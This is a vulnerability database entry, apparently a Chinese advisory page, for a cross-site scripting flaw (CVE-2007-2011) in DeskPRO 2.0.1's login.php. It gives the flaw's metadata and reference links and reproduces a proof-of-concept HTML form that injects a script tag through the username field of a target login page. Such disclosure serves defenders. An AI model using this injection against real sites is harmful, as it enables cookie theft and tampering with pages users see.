DeskPro 'Login.PHP' 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112655 漏洞类型 跨站脚本
发布时间 2007-04-09 更新时间 2007-04-13
CVE编号 CVE-2007-2011 CNNVD-ID CNNVD-200704-224
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/29828
https://cxsecurity.com/issue/WLB-2007040063
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-224
|漏洞详情
DeskPro的login.php中存在跨站脚本攻击漏洞。远程攻击者可以借助用户名参数,注入任意的web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/23381/info

DeskPRO is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

DeskPRO 2.0.1 is vulnerable to this issue. 

<html>
<head><title>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</title><body>

<center><br><br><font size=4>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John
Martinelli</a></font><br>

<br><br>
<form action="http://target.com/login.php" method="post">
<input type=hidden name="login_form" value="login">
<input type=hidden name="_getvars" value="getvars">
<input type=hidden name="_postvars" value="postvars">
<input type=hidden name="_filevars" value="filevars">
<input type=hidden name="password" value="password">
<input type=hidden name="remember" value=0>
<input name="username" size=75 value="<"<<script>alert(1);</script>">
<input type=submit value="Execute XSS Attack" class="button">
</form>

</body></html>
|参考资料

来源:BID
名称:23381
链接:http://www.securityfocus.com/bid/23381
来源:BUGTRAQ
名称:20070408DeskPROv2.0.1-Cross-SiteScriptingVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/465089/100/0/threaded
来源:SECUNIA
名称:24844
链接:http://secunia.com/advisories/24844
来源:OSVDB
名称:34721
链接:http://osvdb.org/34721
来源:VUPEN
名称:ADV-2007-1320
链接:http://www.frsirt.com/english/advisories/2007/1320
来源:SREASON
名称:2556
链接:http://securityreason.com/securityalert/2556
来源:MISC
链接:http://john-martinelli.com/work/deskpro.txt